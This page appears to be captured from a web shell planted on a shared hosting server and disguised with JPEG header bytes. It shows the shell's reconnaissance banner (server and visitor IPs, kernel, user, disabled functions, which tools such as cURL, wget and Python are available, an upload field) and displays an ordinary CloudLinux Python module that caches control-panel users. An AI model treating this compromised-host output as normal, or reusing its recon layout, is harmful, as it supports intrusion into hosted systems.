????JFIF??x?x????'
| Server IP : 172.67.174.47 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /././opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/commons/ |
Upload File : |
#!/usr/bin/python
# coding=utf-8
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT
import logging
from collections import namedtuple
from typing import Optional, Dict, Generator, Tuple, List # NOQA
from clcommon import cpapi, FormattedException
from lvestats.lib.commons import func
class UserNotFoundError(FormattedException):
pass
class User(namedtuple('User', ['username', 'domain', 'reseller'])):
pass
class UsersInfoManager(object):
"""
Implements some different functions for user management;
"""
def __init__(self):
self.users_cache = {} # type: Dict[str, User]
def build_users_cache(self, reseller):
# type: (Optional[str]) -> None
"""Cache data from cpapi for given reseller"""
try:
self.users_cache = dict(self._iter_panel_users(reseller))
except cpapi.NotSupported:
logging.info("Control panel API is not implemented, "
"some features may not work properly")
def _iter_panel_users(self, reseller):
# type: (Optional[str]) -> Generator[Tuple[str, User]]
for login, reseller_, domain in self._iter_panel_users_tuples(reseller):
yield login, User(username=login, reseller=reseller_, domain=domain)
@staticmethod
def _iter_panel_users_tuples(reseller):
# type: (Optional[str]) -> Tuple[str, str, str]
if reseller is None:
for login, reseller_, domain in cpapi.cpinfo(keyls=('cplogin', 'reseller', 'dns')):
yield login, reseller_, domain
else:
# TODO: do we really need get_reseller_domains?
for login, domain in list(func.get_reseller_domains(reseller).items()):
yield login, reseller, domain
def get_domain(self, username, raise_exc=True):
# type: (str, bool) -> Optional[str]
"""Get domain for user"""
try:
return self.users_cache[username].domain
except KeyError as e:
if raise_exc:
raise UserNotFoundError({
'message': "An error occurred while getting domain for user %(username)s",
'context': {'username': username}}) from e
return None
def get_reseller(self, username, raise_exc=True):
# type: (str, bool) -> Optional[str]
"""Get reseller for user"""
try:
return self.users_cache[username].reseller
except KeyError as e:
if raise_exc:
raise UserNotFoundError({
'message': "An error occurred while getting reseller for user %(username)s",
'context': {'username': username}}) from e
return None
def get_login_list(self):
# type: () -> List[str]
"""Get list of cached users"""
return list(self.users_cache.keys())
g_users_manager = UsersInfoManager()